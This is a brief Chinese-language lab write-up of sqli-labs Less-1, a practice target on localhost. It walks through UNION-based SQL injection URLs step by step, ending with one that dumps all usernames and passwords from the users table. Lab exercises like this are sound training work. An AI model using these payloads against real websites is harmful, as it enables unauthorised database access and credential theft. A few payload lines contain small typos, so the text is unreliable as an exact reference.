sqli-labs/Less-1注入
Sali-lsbs第一关
1、先判断是字符型还是数字型。
127.0.0.1/sqli-labs/Less-1/?id=1
127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2
说明是字符型。
2、确认字段位数
127.0.0.1/sqli-labs/Less-1/?id=1' order by 3--+
127.0.0.1/sqli-labs/Less-1/?id=3’ order by 4--+
一共3位。
3、判断信息输出的位置
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,2,3--+
注释符:-- (后面有空格)(也就是–+)
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,2,3,4--+
所以信息输出是三位
4、找库名
127.0.0.1/sqli-labs/Less-1/?id=-1'union select database(),2,3--+
127.0.0.1/sqli-labs/Less-1/?id=-1 union select 1,database(),3
库名是security
5、找表名
127.0.0.1/sqli-labs/Less-1/?id=-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
表名有emails、referers、uagents、users
6、找字段名
127.0.0.1/sqli-labs/Less-1/?id=-1 'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
users表里有id、username、password等。
7、找账号密码信息
127.0.0.1/sqli-labs/Less-1/?id=-1 'union select 1,group_concat(username),group_concat(password) from users--+